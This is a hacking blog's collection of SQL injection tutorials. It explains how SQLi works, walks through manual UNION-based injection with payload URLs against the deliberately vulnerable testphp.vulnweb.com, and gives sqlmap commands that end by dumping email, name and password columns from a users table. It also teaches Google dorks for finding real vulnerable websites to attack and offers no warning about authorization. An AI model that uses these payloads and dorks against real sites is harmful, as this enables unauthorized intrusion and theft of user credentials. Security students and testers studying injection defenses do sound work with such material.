Showing posts with label SQLi. Show all posts
Showing posts with label SQLi. Show all posts
Thursday, February 19, 2015
Tuesday, February 17, 2015
SQL Injection Intermediate Level
This is a theoretical post about types of SQL Injection attacks and the concepts behind SQL Injection. I have added this here since so far we had been dealing with URLs, and will continue to do so. For the attacker, there is no direct way to write complete queries and he/she may only make changes to the URL or input form. However, the knowledge of MySQL (or any other DBMS) part of the attack is necessary, since it will be required when you deal with more robust websites where the standard attacks won't work and you need to get creative. Before reading this post, I recommend these 3:-Monday, March 31, 2014
Hacking Website with Sqlmap in Kali Linux
 |
| A screenshot from the SQLmap official website |
Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.
Kali Linux
First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Sqlmap on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux
Sqlmap
Basically its just a tool to make Sql Injection easier. Their official website introduces the tool as -"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
A lot of features can be found on the SqlMap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySql.
Hacking Websites Using Sqlmap in Kali linux
Sql Version
Boot into your Kali linux machine. Start a terminal, and type -
sqlmap -hIt lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.
 |
| The final result of the above command should be something like this. |
Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-
- Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
- Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.
Enumeration
Database
In this step, we will obtain database name, column names and other useful data from the database.
 |
| List of a few common enumeration commands |
So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Table
Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.
Columns
Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this-
Data
Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
Saturday, March 15, 2014
Hacking Websites Using SQL Injection Manually
Sql Injection - Hacking Websites
In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection. |
| SQL Injection |
Finding A Vulnerable Website
The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.
Dorks
Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)
Using Dorks
Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.
inurl:"products.php?prodID="
inurl:buy.php?category=What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it's search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.
Testing sites for vulnerabilities
Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk ' at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID='
If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like "Not found","Table","Database","Row","Column","Sql","MysqL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.
 |
| A typical error message |
Finding number of columns/rows
Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.
www.site.com/products.php?prodID=25+order+by+1
Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for
www.site.com/products.php?prodID=25+order+by+6
This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things
- The site is vulnerable to SQL injection
- It has 5 columns
Now you need to know which of the columns is vulnerable
Finding Vulnerable columns
Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url
www.site.com/products.php?prodID=25+union+select+1,2,3,4,5
In some cases you might need to put a - behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.
Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.
Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.
Unification
From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is
The actual vulnerability is here
Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk '
This is what you vulnerable page looks like to start with
 |
| As you can guess, it is vulnerable to SQL injection attack |
 |
| 10 columns. Nothing so far. |
 |
| 12 columns. Error.... |
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
 |
| Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column |
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@versionNow finally you'll see something like
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.
Extracting tables from SQL database
Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.
In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()
Obtaining columns
It is similar to obtaining tables, other than the fact that we will use informaiton_schema.columns instead of informaiton_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the table events (I've highlighted it above too). In hex it's code is 4556454e5453 (You can use text to hex convertor - also prefix 0x behind the code before entering it). The final code will be-
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453
 |
| We now know the columns of the table events |
Extracting data from columns
We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS
 |
| The page didn't display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you. |
However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS
 |
| This table has a lot of data, and we have all the character_sets name. |
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS
Alright, the tutorial on automated Sql injection is finally here. Take a look
Sql Injection Using sqlmap in kali linux
Thursday, March 13, 2014
SQL Injection : How It Works
Introduction
Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are -- Creating structure of table
- Entering data
- Making queries (and getting meaningful results from data)
So, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in table with columns like Name, Price, Company, Screen Size, OS, etc.
Now what they do is that they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers without typing any code.
Now what they do is that they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers without typing any code.
This automated method of creating queries for you is relatively safe (since it doesn't give you a lot of flexibility in terms of what queries you can create, you are limited by the syntax of queries they have decided). However, there is another method of creating queries which can be exploited by us.
A url ending in .php is a direct indication that the website/blog uses sql to deliver a lot of it's data, and that you can execute queries directly by changing the url. Usually the data in the SQL tables is protected and can be viewed directly only by certain people (admins etc.). However, when we send some rogue commands to the SQL server, it doesn't understand what to do, and returns an error.
This is a clear indication that with intelligent design of URLs, we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website.
This is a clear indication that with intelligent design of URLs, we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website.
Steps
- We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability.
- After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. Then we should obtain information about SQL version and the number of tables in database and columns in the tables.
- Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial)
For the 2nd and 3rd step, there are 2 ways to do them-
- Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command-
SELECT * FROM Users WHERE UserId = 105 or 1=1Now, while the first part of the query "UserID=105" may not be true for all user, the condition 1=1 will always be true. Basically the query asks the table to return all details of users for whom either user id = 105 or 1=1 (1 is always equal to 1, irrespective of the userId and all other factors). Effectively, you have the username and passwords and all other information about all the users of the website.
- Using some tool - Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don't recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali Linux installed. In Kali Linux, there is a great tool called SQLMap that we'll be using.
Quick cool example
Now suppose you develop a web app. Here are the credentials for login-
Username : abcd
Password : xyz
Now, for login, you have the following condition:
if ("abcd" == Username and "xyz" == Password)
LoginSuccessful
else
LoginFailed
Now if someone enters Username which is different from abcd or password which is different from xyz, then he won't be able to login. Seems to be fine.
But wait, if a person enter username as "pqr" or 1==1 and password as "wxy" or 1==1, your code would check credentials in the following way -
But wait, if a person enter username as "pqr" or 1==1 and password as "wxy" or 1==1, your code would check credentials in the following way -
("abcd"=="pqr" or 1==1) and ("xyz" == "wxy" or 1==1)
Let's translate that into boolean. 1==1 is true obviously, abcd==pqr is not true, nor is xyz==wxy. So, we get,
(false or true) and (false or true)
which becomes
true and true
which becomes
true
So, the person logged into your web app without knowing the username or password.
PS: The example here grossly simplifies a lot of things, but taking care of all details would make this more complicated than it has to be for a first tutorial in SQL injection (coming tutorials are more syntactically correct).
 |
| The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts. |
That's it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.
If you would like to go ahead, then here is the next tutorial in the SQL injection series-
If you would like to go ahead, then here is the next tutorial in the SQL injection series-
Hacking Websites Using SQL Injection Manually
Also, a tutorial on automated Sql injection is finally here. Take a look
